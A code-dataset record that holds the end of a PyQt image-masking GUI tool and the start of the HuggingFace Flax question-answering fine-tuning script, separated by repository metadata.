self.cur_np_im: np.ndarray = None
self.mask_pixmap: QPixmap = None
with open('config.yml') as f:
self.config = EasyDict(yaml.safe_load(f))
self.MainWindow.setConfigDict(self.config)
self.model = torch.load('./final-all.pth')
self.model.to(torch.device('cpu'))
self.model.eval()
self.aimattingthread = AiMattingThread(None)
self.aimattingthread.setModel(self.model)
self.waitdialog = WaitingDialog(self.centralwidget)
def _finshed(pixmap):
# TODO 更改实现方式
self.waitdialog.close()
self.mask_pixmap = pixmap
pix = QPixmap.fromImage(np2qimg(self.cur_np_im))
self.draw_lb.setPixmap(pix, self.mask_pixmap)
self.draw_lb.setDrawLabelState('enable')
self.aimattingthread.finished.connect(_finshed)
def setupSolt(self):
self.set_state_bt()
self.set_input_bt()
self.set_output_bt()
self.set_next_past_bt()
self.set_pen_size_bt()
self.set_export_bt()
self.set_color_mb()
@staticmethod
def read_im(img_path):
im = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
ch = im.shape[-1]
im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB if ch == 3 else cv2.COLOR_BGRA2RGBA)
return im
def set_color_mb(self) -> None:
"""连接menu bar与set color的操作
"""
def _set_color():
self.config.export_color = InputColor.getColors(self.centralwidget, self.config.export_color)
self.MainWindow.setConfigDict(self.config)
self.actionset_color.triggered.connect(_set_color)
def set_draw_lb_background(self, img_path):
self.cur_np_im = self.read_im(img_path)
self.mask_pixmap = None
if self.check_bx.isChecked():
self.aimattingthread.setImage(self.cur_np_im)
self.waitdialog.show()
self.aimattingthread.start()
else:
pix = QPixmap.fromImage(np2qimg(self.cur_np_im))
self.draw_lb.setPixmap(pix, self.mask_pixmap)
self.draw_lb.setDrawLabelState('enable')
def set_res_lb_background(self, img_path):
# np_im = self.read_im(img_path)
# self.resut_lb.setPixmap(QPixmap.fromImage(np2qimg(np_im)), None)
self.resut_lb.setPixmap(QPixmap(img_path), None)
def set_pen_size_bt(self):
self.pen_size_sd.valueChanged['int'].connect(self.draw_lb.setPenSize)
def set_state_bt(self):
self.state_bt.setCheckable(True)
def fc():
if self.state_bt.isChecked():
self.state_bt.setText("修补")
self.draw_lb.setDrawLabelMode('clear')
else:
self.state_bt.setText("消除")
self.draw_lb.setDrawLabelMode('line')
self.state_bt.clicked.connect(fc)
def change_matting_image(self):
self.filename_lb.setText(self.cur_path.name)
self.set_draw_lb_background(self.cur_path.as_posix())
self.export_path = (self.output_dir / (self.cur_path.stem + '.png'))
if self.export_path.exists():
self.set_res_lb_background(self.export_path.as_posix())
else:
self.resut_lb.clearImage()
def set_input_bt(self):
def get_img_path():
if self.output_dir == None:
msgBox = QMessageBox()
msgBox.setWindowTitle("提示")
msgBox.setText("请先设置输出目录")
msgBox.exec()
return
f_path, _ = QFileDialog.getOpenFileName(parent=None, caption="Select Image",
filter="Images (*.jpg *.jpeg *.tif *.bmp *.png)",
options=QFileDialog.ReadOnly)
if f_path != '':
f_path = Path(f_path)
input_dir: Path = f_path.parent
qdir = QDir(input_dir.as_posix())
qdir.setNameFilters("*.jpg *.jpeg *.tif *.bmp *.png".split(' '))
f_list = [input_dir / f.fileName() for f in qdir.entryInfoList()]
self.input_list = ImageFileList(f_path, f_list)
self.cur_path = self.input_list.curt()
self.input_lb.setText(self.cur_path.parent.as_posix())
# 设置进度条
self.file_pb.setRange(0, self.input_list.size)
self.file_pb.setValue(self.input_list.idx)
self.change_matting_image()
else:
self.input_lb.setText("请选择输入文件")
self.input_bt.clicked.connect(get_img_path)
def set_output_bt(self):
def get_out_path():
d_path = QFileDialog.getExistingDirectory(parent=None, caption="Select Directory",
options=QFileDialog.ReadOnly | QFileDialog.ShowDirsOnly)
d_path = Path(d_path)
self.output_dir = d_path
self.output_lb.setText(self.output_dir.as_posix())
self.output_bt.clicked.connect(get_out_path)
def set_next_past_bt(self):
def change_label(mode):
if self.input_list != None and self.output_dir != None:
self.cur_path = (self.input_list.next()
if mode == 'sub' else self.input_list.past())
self.file_pb.setValue(self.input_list.idx) # 进度条设置
self.change_matting_image()
self.next_bt.clicked.connect(lambda: change_label('add'))
self.past_bt.clicked.connect(lambda: change_label('sub'))
def set_export_bt(self):
def export_im():
if self.output_dir != None and self.cur_path != None:
drawed_im = qimg2np(self.draw_lb.exportMaskImage())
# the region need masked value is 1, other is 0
mask = np.expand_dims(drawed_im[..., 1] > 0, -1)
valid_part = self.cur_np_im.copy() * np.logical_not(mask)
rgb = np.reshape(np.array(self.config.export_color[:3], 'uint8'), [1, 1, 3])
alpha = np.reshape(np.array(self.config.export_color[3:4], 'uint8'), [1, 1, 1])
invalid_part = np.tile(rgb,
list(self.cur_np_im.shape[:2]) + [1]) * mask
valid_alpha = np.tile(np.array([[[255]]], 'uint8'),
list(self.cur_np_im.shape[:2]) + [1]) * np.logical_not(mask)
invalid_alpha = np.tile(alpha,
list(self.cur_np_im.shape[:2]) + [1]) * mask
self.cur_np_im_masked = valid_part + invalid_part
alpha_masked = valid_alpha + invalid_alpha
cv2.imwrite(self.export_path.as_posix(),
np.concatenate((cv2.cvtColor(self.cur_np_im_masked, cv2.COLOR_RGB2BGR),
alpha_masked), -1))
self.set_res_lb_background(self.export_path.as_posix())
# print(f'export success:{export_path}')
else:
msgBox = QMessageBox()
msgBox.setWindowTitle("提示")
msgBox.setText("请先设置输入目录与输出目录")
msgBox.exec()
self.export_bt.clicked.connect(export_im)
if __name__ == '__main__':
app = QApplication(sys.argv)
MainWindow = MyMainWindow()
ui = Ui_DrawTask()
ui.setupUi(MainWindow)
ui.setupCustom(MainWindow)
ui.setupSolt()
MainWindow.show()
sys.exit(app.exec_())
| 33.045016 | 104 | 0.648146 |
751ede222c60781749575a9ac9a7f01eb036bd34 | 47,299 | py | Python | examples/flax/question-answering/run_qa.py | Ravoxsg/transformers | 3212a1d4a6fbded40daad7153f222c91acabe82d | [
"Apache-2.0"
] | 31 | 2022-02-02T13:13:41.000Z | 2022-03-29T08:37:20.000Z | examples/flax/question-answering/run_qa.py | Ravoxsg/transformers | 3212a1d4a6fbded40daad7153f222c91acabe82d | [
"Apache-2.0"
] | 1 | 2022-02-17T12:40:59.000Z | 2022-02-17T12:40:59.000Z | examples/flax/question-answering/run_qa.py | Ravoxsg/transformers | 3212a1d4a6fbded40daad7153f222c91acabe82d | [
"Apache-2.0"
] | 2 | 2022-02-07T10:53:33.000Z | 2022-02-17T10:03:01.000Z | #!/usr/bin/env python
# coding=utf-8
# Copyright 2021 The HuggingFace Team All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for question answering.
"""
# You can also adapt this script on your own question answering task. Pointers for this are left as comments.
import json
import logging
import os
import random
import sys
import time
from dataclasses import asdict, dataclass, field
from enum import Enum
from itertools import chain
from pathlib import Path
from typing import Any, Callable, Dict, Optional, Tuple
import datasets
import numpy as np
from datasets import load_dataset, load_metric
from tqdm import tqdm
import jax
import jax.numpy as jnp
import optax
import transformers
from flax import struct, traverse_util
from flax.jax_utils import replicate, unreplicate
from flax.training import train_state
from flax.training.common_utils import get_metrics, onehot, shard
from huggingface_hub import Repository
from transformers import (
AutoConfig,
AutoTokenizer,
EvalPrediction,
FlaxAutoModelForQuestionAnswering,
HfArgumentParser,
PreTrainedTokenizerFast,
is_tensorboard_available,
)
from transformers.file_utils import get_full_repo_name
from transformers.utils import check_min_version
from utils_qa import postprocess_qa_predictions
logger = logging.getLogger(__name__)
# Will error if the minimal version of Transformers is not installed. Remove at your own risks.
check_min_version("4.17.0.dev0")
Array = Any
Dataset = datasets.arrow_dataset.Dataset
PRNGKey = Any
# region Arguments
@dataclass
class TrainingArguments:
output_dir: str = field(
metadata={"help": "The output directory where the model predictions and checkpoints will be written."},
)
overwrite_output_dir: bool = field(
default=False,
metadata={
"help": (
"Overwrite the content of the output directory. "
"Use this to continue training if output_dir points to a checkpoint directory."
)
},
)
do_train: bool = field(default=False, metadata={"help": "Whether to run training."})
do_eval: bool = field(default=False, metadata={"help": "Whether to run eval on the dev set."})
do_predict: bool = field(default=False, metadata={"help": "Whether to run predictions on the test set."})
per_device_train_batch_size: int = field(
default=8, metadata={"help": "Batch size per GPU/TPU core/CPU for training."}
)
per_device_eval_batch_size: int = field(
default=8, metadata={"help": "Batch size per GPU/TPU core/CPU for evaluation."}
)
learning_rate: float = field(default=5e-5, metadata={"help": "The initial learning rate for AdamW."})
weight_decay: float = field(default=0.0, metadata={"help": "Weight decay for AdamW if we apply some."})
adam_beta1: float = field(default=0.9, metadata={"help": "Beta1 for AdamW optimizer"})
adam_beta2: float = field(default=0.999, metadata={"help": "Beta2 for AdamW optimizer"})
adam_epsilon: float = field(default=1e-8, metadata={"help": "Epsilon for AdamW optimizer."})
adafactor: bool = field(default=False, metadata={"help": "Whether or not to replace AdamW by Adafactor."})
num_train_epochs: float = field(default=3.0, metadata={"help": "Total number of training epochs to perform."})
warmup_steps: int = field(default=0, metadata={"help": "Linear warmup over warmup_steps."})
logging_steps: int = field(default=500, metadata={"help": "Log every X updates steps."})
save_steps: int = field(default=500, metadata={"help": "Save checkpoint every X updates steps."})
eval_steps: int = field(default=None, metadata={"help": "Run an evaluation every X steps."})
seed: int = field(default=42, metadata={"help": "Random seed that will be set at the beginning of training."})
push_to_hub: bool = field(
default=False, metadata={"help": "Whether or not to upload the trained model to the model hub after training."}
)
hub_model_id: str = field(
default=None, metadata={"help": "The name of the repository to keep in sync with the local `output_dir`."}
)
hub_token: str = field(default=None, metadata={"help": "The token to use to push to the Model Hub."})
def __post_init__(self):
if self.output_dir is not None:
self.output_dir = os.path.expanduser(self.output_dir)
def to_dict(self):
"""
Serializes this instance while replace `Enum` by their values (for JSON serialization support). It obfuscates
the token values by removing their value.
"""
d = asdict(self)
for k, v in d.items():
if isinstance(v, Enum):
d[k] = v.value
if isinstance(v, list) and len(v) > 0 and isinstance(v[0], Enum):
d[k] = [x.value for x in v]
if k.endswith("_token"):
d[k] = f"<{k.upper()}>"
return d
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Path to directory to store the pretrained models downloaded from huggingface.co"},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
},
)
dtype: Optional[str] = field(
default="float32",
metadata={
"help": "Floating-point format in which the model weights should be initialized and trained. Choose one of `[float32, float16, bfloat16]`."
},
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
dataset_name: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
test_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input test data file to evaluate the perplexity on (a text file)."},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
max_seq_length: int = field(
default=384,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
pad_to_max_length: bool = field(
default=False,
metadata={
"help": "Whether to pad all samples to `max_seq_length`. "
"If False, will pad the samples dynamically when batching to the maximum length in the batch (which can "
"be faster on GPU but will be slower on TPU)."
},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
},
)
max_predict_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of prediction examples to this "
"value if set."
},
)
version_2_with_negative: bool = field(
default=False, metadata={"help": "If true, some of the examples do not have an answer."}
)
null_score_diff_threshold: float = field(
default=0.0,
metadata={
"help": "The threshold used to select the null answer: if the best answer has a score that is less than "
"the score of the null answer minus this threshold, the null answer is selected for this example. "
"Only useful when `version_2_with_negative=True`."
},
)
doc_stride: int = field(
default=128,
metadata={"help": "When splitting up a long document into chunks, how much stride to take between chunks."},
)
n_best_size: int = field(
default=20,
metadata={"help": "The total number of n-best predictions to generate when looking for an answer."},
)
max_answer_length: int = field(
default=30,
metadata={
"help": "The maximum length of an answer that can be generated. This is needed because the start "
"and end predictions are not conditioned on one another."
},
)
def __post_init__(self):
if (
self.dataset_name is None
and self.train_file is None
and self.validation_file is None
and self.test_file is None
):
raise ValueError("Need either a dataset name or a training/validation file/test_file.")
else:
if self.train_file is not None:
extension = self.train_file.split(".")[-1]
assert extension in ["csv", "json"], "`train_file` should be a csv or a json file."
if self.validation_file is not None:
extension = self.validation_file.split(".")[-1]
assert extension in ["csv", "json"], "`validation_file` should be a csv or a json file."
if self.test_file is not None:
extension = self.test_file.split(".")[-1]
assert extension in ["csv", "json"], "`test_file` should be a csv or a json file."
# endregion
# region Create a train state
def create_train_state(
model: FlaxAutoModelForQuestionAnswering,
learning_rate_fn: Callable[[int], float],
num_labels: int,
training_args: TrainingArguments,
) -> train_state.TrainState:
"""Create initial training state."""
class TrainState(train_state.TrainState):
"""Train state with an Optax optimizer.
The two functions below differ depending on whether the task is classification
or regression.
Args:
logits_fn: Applied to last layer to obtain the logits.
loss_fn: Function to compute the loss.
"""
logits_fn: Callable = struct.field(pytree_node=False)
loss_fn: Callable = struct.field(pytree_node=False)
# We use Optax's "masking" functionality to not apply weight decay
# to bias and LayerNorm scale parameters. decay_mask_fn returns a
# mask boolean with the same structure as the parameters.
# The mask is True for parameters that should be decayed.
# Note that this mask is specifically adapted for FlaxBERT-like models.
# For other models, one should correct the layer norm parameter naming
# accordingly.
def decay_mask_fn(params):
flat_params = traverse_util.flatten_dict(params)
flat_mask = {path: (path[-1] != "bias" and path[-2:] != ("LayerNorm", "scale")) for path in flat_params}
return traverse_util.unflatten_dict(flat_mask)
tx = optax.adamw(
learning_rate=learning_rate_fn,
b1=training_args.adam_beta1,
b2=training_args.adam_beta2,
eps=training_args.adam_epsilon,
weight_decay=training_args.weight_decay,
mask=decay_mask_fn,
)
def cross_entropy_loss(logits, labels):
start_loss = optax.softmax_cross_entropy(logits[0], onehot(labels[0], num_classes=num_labels))
end_loss = optax.softmax_cross_entropy(logits[1], onehot(labels[1], num_classes=num_labels))
xentropy = (start_loss + end_loss) / 2.0
return jnp.mean(xentropy)
return TrainState.create(
apply_fn=model.__call__,
params=model.params,
tx=tx,
logits_fn=lambda logits: logits,
loss_fn=cross_entropy_loss,
)
# endregion
# region Create learning rate function
def create_learning_rate_fn(
train_ds_size: int, train_batch_size: int, num_train_epochs: int, num_warmup_steps: int, learning_rate: float
) -> Callable[[int], jnp.array]:
"""Returns a linear warmup, linear_decay learning rate function."""
steps_per_epoch = train_ds_size // train_batch_size
num_train_steps = steps_per_epoch * num_train_epochs
warmup_fn = optax.linear_schedule(init_value=0.0, end_value=learning_rate, transition_steps=num_warmup_steps)
decay_fn = optax.linear_schedule(
init_value=learning_rate, end_value=0, transition_steps=num_train_steps - num_warmup_steps
)
schedule_fn = optax.join_schedules(schedules=[warmup_fn, decay_fn], boundaries=[num_warmup_steps])
return schedule_fn
# endregion
# region train data iterator
def train_data_collator(rng: PRNGKey, dataset: Dataset, batch_size: int):
"""Returns shuffled batches of size `batch_size` from truncated `train dataset`, sharded over all local devices."""
steps_per_epoch = len(dataset) // batch_size
perms = jax.random.permutation(rng, len(dataset))
perms = perms[: steps_per_epoch * batch_size] # Skip incomplete batch.
perms = perms.reshape((steps_per_epoch, batch_size))
for perm in perms:
batch = dataset[perm]
batch = {k: np.array(v) for k, v in batch.items()}
batch = shard(batch)
yield batch
# endregion
# region eval data iterator
def eval_data_collator(dataset: Dataset, batch_size: int):
"""Returns batches of size `batch_size` from `eval dataset`, sharded over all local devices."""
for i in range(len(dataset) // batch_size):
batch = dataset[i * batch_size : (i + 1) * batch_size]
batch = {k: np.array(v) for k, v in batch.items()}
batch = shard(batch)
yield batch
# endregion
def main():
# region Argument parsing
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# endregion
# region Logging
# Make one log on every process with the configuration for debugging.
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO,
)
# Setup logging, we only want one process per machine to log things on the screen.
logger.setLevel(logging.INFO if jax.process_index() == 0 else logging.ERROR)
if jax.process_index() == 0:
datasets.utils.logging.set_verbosity_warning()
transformers.utils.logging.set_verbosity_info()
else:
datasets.utils.logging.set_verbosity_error()
transformers.utils.logging.set_verbosity_error()
# endregion
# Handle the repository creation
if training_args.push_to_hub:
if training_args.hub_model_id is None:
repo_name = get_full_repo_name(
Path(training_args.output_dir).absolute().name, token=training_args.hub_token
)
else:
repo_name = training_args.hub_model_id
repo = Repository(training_args.output_dir, clone_from=repo_name)
# region Load Data
# Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below)
# or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/
# (the dataset will be downloaded automatically from the datasets Hub).
#
# For CSV/JSON files, this script will use the column called 'text' or the first column if no column called
# 'text' is found. You can easily tweak this behavior (see below).
#
# In distributed training, the load_dataset function guarantee that only one local process can concurrently
# download the dataset.
if data_args.dataset_name is not None:
# Downloading and loading a dataset from the hub.
raw_datasets = load_dataset(
data_args.dataset_name, data_args.dataset_config_name, cache_dir=model_args.cache_dir
)
else:
# Loading the dataset from local csv or json file.
data_files = {}
if data_args.train_file is not None:
data_files["train"] = data_args.train_file
extension = data_args.train_file.split(".")[-1]
if data_args.validation_file is not None:
data_files["validation"] = data_args.validation_file
extension = data_args.validation_file.split(".")[-1]
if data_args.test_file is not None:
data_files["test"] = data_args.test_file
extension = data_args.test_file.split(".")[-1]
raw_datasets = load_dataset(extension, data_files=data_files, field="data", cache_dir=model_args.cache_dir)
# See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at
# https://huggingface.co/docs/datasets/loading_datasets.html.
# endregion
# region Load pretrained model and tokenizer
#
# Load pretrained model and tokenizer
config = AutoConfig.from_pretrained(
model_args.config_name if model_args.config_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
tokenizer = AutoTokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
use_fast=True,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
# endregion
# region Tokenizer check: this script requires a fast tokenizer.
if not isinstance(tokenizer, PreTrainedTokenizerFast):
raise ValueError(
"This example script only works for models that have a fast tokenizer. Checkout the big table of models "
"at https://huggingface.co/transformers/index.html#supported-frameworks to find the model types that meet this "
"requirement"
)
# endregion
# region Preprocessing the datasets
# Preprocessing is slightly different for training and evaluation.
if training_args.do_train:
column_names = raw_datasets["train"].column_names
elif training_args.do_eval:
column_names = raw_datasets["validation"].column_names
else:
column_names = raw_datasets["test"].column_names
question_column_name = "question" if "question" in column_names else column_names[0]
context_column_name = "context" if "context" in column_names else column_names[1]
answer_column_name = "answers" if "answers" in column_names else column_names[2]
# Padding side determines if we do (question|context) or (context|question).
pad_on_right = tokenizer.padding_side == "right"
if data_args.max_seq_length > tokenizer.model_max_length:
logger.warning(
f"The max_seq_length passed ({data_args.max_seq_length}) is larger than the maximum length for the"
f"model ({tokenizer.model_max_length}). Using max_seq_length={tokenizer.model_max_length}."
)
max_seq_length = min(data_args.max_seq_length, tokenizer.model_max_length)
# Training preprocessing
def prepare_train_features(examples):
# Some of the questions have lots of whitespace on the left, which is not useful and will make the
# truncation of the context fail (the tokenized question will take a lots of space). So we remove that
# left whitespace
examples[question_column_name] = [q.lstrip() for q in examples[question_column_name]]
# Tokenize our examples with truncation and maybe padding, but keep the overflows using a stride. This results
# in one example possible giving several features when a context is long, each of those features having a
# context that overlaps a bit the context of the previous feature.
tokenized_examples = tokenizer(
examples[question_column_name if pad_on_right else context_column_name],
examples[context_column_name if pad_on_right else question_column_name],
truncation="only_second" if pad_on_right else "only_first",
max_length=max_seq_length,
stride=data_args.doc_stride,
return_overflowing_tokens=True,
return_offsets_mapping=True,
padding="max_length",
)
# Since one example might give us several features if it has a long context, we need a map from a feature to
# its corresponding example. This key gives us just that.
sample_mapping = tokenized_examples.pop("overflow_to_sample_mapping")
# The offset mappings will give us a map from token to character position in the original context. This will
# help us compute the start_positions and end_positions.
offset_mapping = tokenized_examples.pop("offset_mapping")
# Let's label those examples!
tokenized_examples["start_positions"] = []
tokenized_examples["end_positions"] = []
for i, offsets in enumerate(offset_mapping):
# We will label impossible answers with the index of the CLS token.
input_ids = tokenized_examples["input_ids"][i]
cls_index = input_ids.index(tokenizer.cls_token_id)
# Grab the sequence corresponding to that example (to know what is the context and what is the question).
sequence_ids = tokenized_examples.sequence_ids(i)
# One example can give several spans, this is the index of the example containing this span of text.
sample_index = sample_mapping[i]
answers = examples[answer_column_name][sample_index]
# If no answers are given, set the cls_index as answer.
if len(answers["answer_start"]) == 0:
tokenized_examples["start_positions"].append(cls_index)
tokenized_examples["end_positions"].append(cls_index)
else:
# Start/end character index of the answer in the text.
start_char = answers["answer_start"][0]
end_char = start_char + len(answers["text"][0])
# Start token index of the current span in the text.
token_start_index = 0
while sequence_ids[token_start_index] != (1 if pad_on_right else 0):
token_start_index += 1
# End token index of the current span in the text.
token_end_index = len(input_ids) - 1
while sequence_ids[token_end_index] != (1 if pad_on_right else 0):
token_end_index -= 1
# Detect if the answer is out of the span (in which case this feature is labeled with the CLS index).
if not (offsets[token_start_index][0] <= start_char and offsets[token_end_index][1] >= end_char):
tokenized_examples["start_positions"].append(cls_index)
tokenized_examples["end_positions"].append(cls_index)
else:
# Otherwise move the token_start_index and token_end_index to the two ends of the answer.
# Note: we could go after the last offset if the answer is the last word (edge case).
while token_start_index < len(offsets) and offsets[token_start_index][0] <= start_char:
token_start_index += 1
tokenized_examples["start_positions"].append(token_start_index - 1)
while offsets[token_end_index][1] >= end_char:
token_end_index -= 1
tokenized_examples["end_positions"].append(token_end_index + 1)
return tokenized_examples
processed_raw_datasets = dict()
if training_args.do_train:
if "train" not in raw_datasets:
raise ValueError("--do_train requires a train dataset")
train_dataset = raw_datasets["train"]
if data_args.max_train_samples is not None:
# We will select sample from whole data if agument is specified
train_dataset = train_dataset.select(range(data_args.max_train_samples))
# Create train feature from dataset
train_dataset = train_dataset.map(
prepare_train_features,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=column_names,
load_from_cache_file=not data_args.overwrite_cache,
)
if data_args.max_train_samples is not None:
# Number of samples might increase during Feature Creation, We select only specified max samples
train_dataset = train_dataset.select(range(data_args.max_train_samples))
processed_raw_datasets["train"] = train_dataset
# Validation preprocessing
def prepare_validation_features(examples):
# Some of the questions have lots of whitespace on the left, which is not useful and will make the
# truncation of the context fail (the tokenized question will take a lots of space). So we remove that
# left whitespace
examples[question_column_name] = [q.lstrip() for q in examples[question_column_name]]
# Tokenize our examples with truncation and maybe padding, but keep the overflows using a stride. This results
# in one example possible giving several features when a context is long, each of those features having a
# context that overlaps a bit the context of the previous feature.
tokenized_examples = tokenizer(
examples[question_column_name if pad_on_right else context_column_name],
examples[context_column_name if pad_on_right else question_column_name],
truncation="only_second" if pad_on_right else "only_first",
max_length=max_seq_length,
stride=data_args.doc_stride,
return_overflowing_tokens=True,
return_offsets_mapping=True,
padding="max_length",
)
# Since one example might give us several features if it has a long context, we need a map from a feature to
# its corresponding example. This key gives us just that.
sample_mapping = tokenized_examples.pop("overflow_to_sample_mapping")
# For evaluation, we will need to convert our predictions to substrings of the context, so we keep the
# corresponding example_id and we will store the offset mappings.
tokenized_examples["example_id"] = []
for i in range(len(tokenized_examples["input_ids"])):
# Grab the sequence corresponding to that example (to know what is the context and what is the question).
sequence_ids = tokenized_examples.sequence_ids(i)
context_index = 1 if pad_on_right else 0
# One example can give several spans, this is the index of the example containing this span of text.
sample_index = sample_mapping[i]
tokenized_examples["example_id"].append(examples["id"][sample_index])
# Set to None the offset_mapping that are not part of the context so it's easy to determine if a token
# position is part of the context or not.
tokenized_examples["offset_mapping"][i] = [
(o if sequence_ids[k] == context_index else None)
for k, o in enumerate(tokenized_examples["offset_mapping"][i])
]
return tokenized_examples
if training_args.do_eval:
if "validation" not in raw_datasets:
raise ValueError("--do_eval requires a validation dataset")
eval_examples = raw_datasets["validation"]
if data_args.max_eval_samples is not None:
# We will select sample from whole data
eval_examples = eval_examples.select(range(data_args.max_eval_samples))
# Validation Feature Creation
eval_dataset = eval_examples.map(
prepare_validation_features,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=column_names,
load_from_cache_file=not data_args.overwrite_cache,
)
if data_args.max_eval_samples is not None:
# During Feature creation dataset samples might increase, we will select required samples again
eval_dataset = eval_dataset.select(range(data_args.max_eval_samples))
processed_raw_datasets["validation"] = eval_dataset
if training_args.do_predict:
if "test" not in raw_datasets:
raise ValueError("--do_predict requires a test dataset")
predict_examples = raw_datasets["test"]
if data_args.max_predict_samples is not None:
# We will select sample from whole data
predict_examples = predict_examples.select(range(data_args.max_predict_samples))
# Predict Feature Creation
predict_dataset = predict_examples.map(
prepare_validation_features,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=column_names,
load_from_cache_file=not data_args.overwrite_cache,
)
if data_args.max_predict_samples is not None:
# During Feature creation dataset samples might increase, we will select required samples again
predict_dataset = predict_dataset.select(range(data_args.max_predict_samples))
processed_raw_datasets["test"] = predict_dataset
# endregion
# region Metrics and Post-processing:
def post_processing_function(examples, features, predictions, stage="eval"):
# Post-processing: we match the start logits and end logits to answers in the original context.
predictions = postprocess_qa_predictions(
examples=examples,
features=features,
predictions=predictions,
version_2_with_negative=data_args.version_2_with_negative,
n_best_size=data_args.n_best_size,
max_answer_length=data_args.max_answer_length,
null_score_diff_threshold=data_args.null_score_diff_threshold,
output_dir=training_args.output_dir,
prefix=stage,
)
# Format the result to the format the metric expects.
if data_args.version_2_with_negative:
formatted_predictions = [
{"id": k, "prediction_text": v, "no_answer_probability": 0.0} for k, v in predictions.items()
]
else:
formatted_predictions = [{"id": k, "prediction_text": v} for k, v in predictions.items()]
references = [{"id": ex["id"], "answers": ex[answer_column_name]} for ex in examples]
return EvalPrediction(predictions=formatted_predictions, label_ids=references)
metric = load_metric("squad_v2" if data_args.version_2_with_negative else "squad")
def compute_metrics(p: EvalPrediction):
return metric.compute(predictions=p.predictions, references=p.label_ids)
# Create and fill numpy array of size len_of_validation_data * max_length_of_output_tensor
def create_and_fill_np_array(start_or_end_logits, dataset, max_len):
"""
Create and fill numpy array of size len_of_validation_data * max_length_of_output_tensor
Args:
start_or_end_logits(:obj:`tensor`):
This is the output predictions of the model. We can only enter either start or end logits.
eval_dataset: Evaluation dataset
max_len(:obj:`int`):
The maximum length of the output tensor. ( See the model.eval() part for more details )
"""
step = 0
# create a numpy array and fill it with -100.
logits_concat = np.full((len(dataset), max_len), -100, dtype=np.float64)
# Now since we have create an array now we will populate it with the outputs of the model.
for i, output_logit in enumerate(start_or_end_logits): # populate columns
# We have to fill it such that we have to take the whole tensor and replace it on the newly created array
# And after every iteration we have to change the step
batch_size = output_logit.shape[0]
cols = output_logit.shape[1]
if step + batch_size < len(dataset):
logits_concat[step : step + batch_size, :cols] = output_logit
else:
logits_concat[step:, :cols] = output_logit[: len(dataset) - step]
step += batch_size
return logits_concat
# endregion
# region Training steps and logging init
train_dataset = processed_raw_datasets["train"]
eval_dataset = processed_raw_datasets["validation"]
# Log a few random samples from the training set:
for index in random.sample(range(len(train_dataset)), 3):
logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
# Define a summary writer
has_tensorboard = is_tensorboard_available()
if has_tensorboard and jax.process_index() == 0:
try:
from flax.metrics.tensorboard import SummaryWriter
summary_writer = SummaryWriter(training_args.output_dir)
summary_writer.hparams({**training_args.to_dict(), **vars(model_args), **vars(data_args)})
except ImportError as ie:
has_tensorboard = False
logger.warning(
f"Unable to display metrics through TensorBoard because some package are not installed: {ie}"
)
else:
logger.warning(
"Unable to display metrics through TensorBoard because the package is not installed: "
"Please run pip install tensorboard to enable."
)
